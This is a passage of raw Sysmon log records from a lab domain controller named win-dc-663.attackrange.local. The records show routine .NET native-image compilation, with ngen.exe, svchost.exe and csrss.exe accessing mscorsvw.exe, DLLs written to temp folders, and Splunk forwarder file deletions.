21:04:31.022{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-D603-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.865{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-EA03-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.850{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-EA03-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.850{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-EA03-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:32.818{4DB9351A-A1E0-60D3-E903-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18bc-0\Microsoft.Windows.Dns.dll2021-06-23 21:04:32.818 23542300x800000000000000020923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.772{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B72973E267D9A6EA5B12C2FFF3F5A5C,SHA256=AF24EB44B04FD47647211F4FDF837315A43F3FACFE006C2739104BD00DE92A60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.740{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E903-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.725{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E903-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.725{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E903-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.662{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E803-00000000CF01}6772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.647{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E803-00000000CF01}6772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.647{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E803-00000000CF01}6772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:32.631{4DB9351A-A1E0-60D3-E703-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1704-0\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll2021-06-23 21:04:32.631 10341000x800000000000000020915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.537{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E703-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.522{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E703-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.522{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E703-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020912Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.443{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E603-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020911Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.428{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E603-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.428{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E603-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:32.412{4DB9351A-A1E0-60D3-E503-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\440-0\Microsoft.Windows.Diagnosis.SDHost.dll2021-06-23 21:04:32.412 10341000x800000000000000020908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.334{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E503-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.318{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E503-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020906Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.318{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E503-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020905Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.256{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AD1474A8ABC050AF8383BD64257AACA,SHA256=DD2326C8A04CEF884CEEE4B87AA0AADC45BDF3E58F8D2A9998633CF444C49E6F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020904Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.240{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E403-00000000CF01}7156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020903Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.209{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48CBA67371F3076E4D541C0C9A9079D7,SHA256=7F1AAA23CCA11D0A11F94432C5EFF8D1B75D605A13053B71FB2562B117B45E1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020902Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.209{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E403-00000000CF01}7156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020901Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 